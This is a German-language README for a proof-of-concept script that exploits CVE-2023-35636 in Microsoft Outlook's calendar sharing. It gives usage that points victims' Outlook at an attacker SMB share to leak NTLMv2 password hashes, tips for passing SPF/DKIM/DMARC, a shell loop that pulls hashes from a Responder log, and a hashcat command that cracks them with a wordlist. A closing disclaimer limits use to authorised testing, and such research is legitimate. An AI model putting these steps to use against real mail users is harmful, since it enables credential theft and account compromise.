
Microsoft Outlook Sicherheitslücke zur Offenlegung von Informationen (leakt Passwort-Hash) - Expect Script POC
Microsoft Outlook Sicherheitslücke zur Informationsoffenlegung (Leak von Passwort-Hashes) - Expect-Skript POC
CVE-2023-35636 ist ein Exploit der Kalenderfreigabefunktion in Microsoft Outlook, bei dem das Hinzufügen von zwei Headern zu einer E-Mail Outlook dazu veranlasst, Inhalte zu teilen und eine bestimmte Maschine zu kontaktieren, wodurch die Möglichkeit geschaffen wird, einen NTLM-v2-Hash abzufangen.

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (dont forget all the \)

Hinweise: chmod +x cve-2023-35636.sh
erfordert die App 'expect'
erfordert legitimen IP-Absender und E-Mail-Absender (um SPF, DKIM, DMARC zu bestehen)


for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O
Dank an: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
Workaround/Fix: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636
mehr über mich ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Haftungsausschluss: WICHTIG: Dieses Skript ist NUR für Bildungs-, ethische Test- und rechtmäßige Zwecke bestimmt. Verwenden Sie es nicht auf Systemen oder Netzwerken ohne ausdrückliche Genehmigung. Unbefugter Zugriff auf Computersysteme und Netzwerke ist illegal, und Benutzer, die bei unbefugten Aktivitäten erwischt werden, müssen mit rechtlichen Konsequenzen rechnen. Der Autor ist NICHT verantwortlich für Schäden, die durch die missbräuchliche Verwendung dieses Skripts entstehen.